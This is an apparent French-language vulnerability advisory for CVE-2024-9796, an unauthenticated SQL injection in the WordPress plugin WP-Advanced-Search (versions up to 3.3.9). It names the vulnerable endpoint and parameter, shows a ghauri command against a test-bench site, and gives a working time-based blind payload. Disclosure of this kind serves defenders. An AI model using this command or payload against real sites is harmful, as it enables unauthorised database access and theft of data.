
WordPress WP-Advanced-Search <= 3.3.9 - Injection SQL non authentifiée
WordPress WP-Advanced-Search <= 3.3.9 - Injection SQL non authentifiée
Le plugin WordPress WP-Advanced-Search pour WordPress est vulnérable à une injection SQL dans toutes les versions jusqu'à la version 3.3.9 incluse, en raison d'un échappement insuffisant du paramètre fourni par l'utilisateur et d'un manque de préparation adéquate de la requête SQL existante. Cela permet à des attaquants non authentifiés d'ajouter des requêtes SQL supplémentaires aux requêtes existantes, pouvant être utilisées pour extraire des informations sensibles de la base de données.
Type: plugin
CVSS Score: 7.5
CVE: CVE-2024-9796
Slug: wp-advanced-search
Lien de téléchargement : Télécharger wp-advanced-search Version 3.3.9
ghauri -u "https://wpscan-vulnerability-test-bench.ddev.site/wp-content/plugins/wp-advanced-search/class.inc/autocompletion/autocompletion-PHP5.5.php?t=wp_autosuggest&f=words&l=5&type=0&e=utf-8&q=c&limit=5×tamp=19692269759899"
Parameter: f (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (IF - comment)
Payload: t=wp_autosuggest&f=if(now()=sysdate(),SLEEP(9),0)-- wXyW&l=5&type=0&e=utf-8&q=c&limit=5×tamp=13672261755853'